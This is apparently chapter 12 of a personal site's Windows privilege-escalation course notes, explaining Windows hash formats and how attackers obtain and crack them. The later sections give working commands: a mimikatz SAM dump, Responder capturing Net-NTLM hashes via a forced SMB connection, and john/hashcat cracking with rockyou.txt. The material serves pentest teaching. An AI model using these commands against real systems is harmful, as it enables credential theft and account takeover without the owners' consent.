HomeGitHubPortfolioTwitter/XMediumCont@ct

12 - Windows Hashes

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

Hash Functions

Hash functions are cryptographic tools that transform input data (e.g., passwords) into fixed-length values called hashes. These are one-way functions, meaning it is computationally infeasible to retrieve the original input from the hash.

Example using sha256:

$ echo -n "leonardo" | sha256sum
18ccba186d8757c20cbf05d7a98b2c64f9f16eb64ea4a64659bbc5c9b7b3a7fe  -

Authentication

Hash functions are widely used in authentication to protect user credentials. Passwords are hashed before storage, ensuring that even if the database is compromised, the plaintext passwords remain undisclosed.

Authentication Workflow:

  1. User provides password P.

  2. Application computes H(P) (hash of the password).

  3. The hash H(P) is compared to the stored hash.

  4. Authentication succeeds if the hashes match.

Windows Hashes

Windows uses several hash formats for authentication and data protection.

LM (LAN Manager) Hash

  • Legacy hash format, disabled by default since Windows Vista.

  • Algorithm:

    1. Convert the password to uppercase.

    2. Pad to 14 characters.

    3. Split into two 7-character chunks.

    4. Use each chunk as a DES key to encrypt "KGS!@#$%".

    5. Concatenate the results.

Check LM Hash Configuration:

Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'NoLMHash'

NTLM Hash

  • Modern Windows systems store passwords as NTLM hashes.

  • Algorithm:

    NTLM = MD4(UTF-16-LE(password))

  • Example: NTLM hash of "password" is:

    8846F7EAEE8FB117AD06BDD830B7586C

Net-NTLMv1

  • Used in challenge/response authentication protocols.

  • Algorithm:

    response = DES(K1, C) | DES(K2, C) | DES(K3, C)

    • C: 8-byte server challenge.

    • K1, K2, K3: Derived from the NT hash.

Net-NTLMv2

  • Improved version of NTLMv1, leveraging HMAC-MD5 for better security.

  • Algorithm:

    v2-Hash = HMAC-MD5(NT-Hash, username, domain)
response = HMAC-MD5(v2-Hash, server challenge, client challenge)

Check NTLM Compatibility:

Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LMCompatibilityLevel'

Kerberos

  • Used for authentication in Active Directory environments.

  • Employs ticket-based authentication with encrypted Ticket Granting Tickets (TGTs) and Service Tickets (TGSs).

DPAPI

  • Windows Data Protection API (DPAPI) uses hashes to encrypt user data such as browser credentials and encryption keys.

Obtaining Hashes

LM, NTLM: SAM Dump with SeBackupPrivilege + Mimikatz

Dump hashes from the Security Accounts Manager (SAM):

mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

Net-NTLM: Using Responder

Responder captures Net-NTLM hashes via SMB:

  1. Install Responder:

    git clone https://github.com/lgandx/Responder.git
cd Responder
pip install -r requirements.txt

  2. Start Responder:

    sudo python3 Responder.py -I <network-interface>

  3. Trigger SMB Connection from Victim:

    dir \\192.168.122.1\test

Captured Net-NTLMv2 hash:

NTLMv2-SSP Hash: User::Domain:hash_parts

Cracking Windows Hashes

Required Tools:

  • John the Ripper

  • Hashcat

Common Wordlist:

Download rockyou.txt:

curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz

Cracking Commands:

  • LM Hash:

    john --format=lm --wordlist=rockyou.txt hash.txt
hashcat -m 3000 -a 3 hash.txt

  • NTLM Hash:

    john --format=nt --wordlist=rockyou.txt hash.txt
hashcat -m 1000 -a 3 hash.txt

  • Net-NTLMv1:

    john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 -a 3 hash.txt

  • Net-NTLMv2:

    john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 -a 3 hash.txt

Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!

Previous11 - Files with Sensitive DataNext13 - Stored Credentials and the Windows Vault

Last updated